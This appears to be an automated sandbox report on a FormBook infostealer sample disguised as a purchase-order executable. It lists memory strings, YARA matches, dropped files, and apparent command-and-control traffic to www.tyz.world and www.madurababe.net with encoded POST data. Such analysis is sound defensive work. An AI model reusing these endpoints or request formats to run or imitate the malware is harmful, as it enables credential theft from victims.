Source: PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.coma
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comalic
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comals
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: PO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comicta
Source: PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comiono?
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.commsed
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com~
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO#12108997.exe, 00000000.00000003.243309494.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnal
Source: PO#12108997.exe, 00000000.00000003.243309494.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnd
Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnr-ca
Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnt-p
Source: PO#12108997.exe, 00000000.00000003.243228061.00000000062C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnu
Source: PO#12108997.exe, 00000000.00000003.253530830.00000000062F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/$
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/?
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/L
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/c
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/h
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/z
Source: cmmon32.exe, 00000011.00000002.504383101.0000000005219000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.madurababe.net
Source: cmmon32.exe, 00000011.00000002.504383101.0000000005219000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.madurababe.net/p12s/
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.240907648.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.240907648.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com2
Source: PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242576157.00000000062DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.comt
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: cmmon32.exe, 00000011.00000002.504685915.000000000558F000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD
Source: unknown HTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 76 78 63 79 5a 38 6b 6a 6e 4f 38 75 5a 34 4e 7e 36 77 67 6d 6b 73 58 28 47 53 73 71 55 49 71 6b 6a 41 56 77 34 31 45 46 34 69 46 41 50 7a 32 32 61 36 64 6e 62 66 51 34 36 51 34 37 68 45 78 59 6a 54 68 38 47 34 54 65 34 79 76 74 53 31 4e 38 56 6f 6c 35 6f 58 64 56 6e 39 55 71 64 53 56 36 48 33 49 43 77 53 4f 67 34 63 73 68 49 4c 46 53 47 4b 70 48 52 7a 57 6c 6c 63 41 66 64 62 48 74 4b 75 30 63 31 41 6c 59 44 66 54 6d 33 46 47 30 39 4a 4e 75 48 36 30 66 58 67 51 46 31 38 43 62 50 65 31 6c 76 77 37 46 49 6d 4f 4d 34 37 42 34 67 43 48 36 65 4d 56 67 74 78 5f 45 4f 42 69 56 52 58 4b 64 67 66 30 6c 33 37 53 36 42 54 70 39 32 32 5f 68 64 6f 78 4e 6d 43 55 4e 43 76 38 30 37 4d 4d 47 57 44 51 4d 54 48 75 74 66 77 75 62 5a 56 63 4b 43 64 48 72 47 52 46 50 51 73 67 71 73 78 53 46 43 4a 4c 63 49 65 41 31 36 28 65 47 48 37 55 6e 57 79 4b 68 38 6c 5f 39 55 56 44 73 4d 37 72 4e 52 38 33 72 42 57 46 6f 46 75 56 72 52 71 79 33 68 45 36 78 52 68 6e 4c 6c 28 69 32 6a 32 37 55 66 4d 75 44 51 71 38 62 55 47 42 42 6d 77 5f 61 33 47 53 56 41 47 51 56 41 57 6e 64 72 74 37 77 7a 37 4e 49 5f 42 62 69 59 6b 61 7e 65 47 48 57 6b 73 5a 7a 35 38 71 55 51 7a 53 57 76 74 47 75 65 59 73 4a 6a 4e 44 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9UqdSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiVRXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rNR83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A).
Source: unknown DNS traffic detected: queries for: www.tyz.world
Source: global traffic HTTP traffic detected: GET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1Host: www.tyz.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1Host: www.madurababe.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Creates a DirectInput object (often for capturing keystrokes)
Source: PO#12108997.exe, 00000000.00000002.270009713.000000000180A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\cmmon32.exe Dropped file: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\cmmon32.exe Dropped file: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: PO#12108997.exe
Uses 32bit PE files
Source: PO#12108997.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
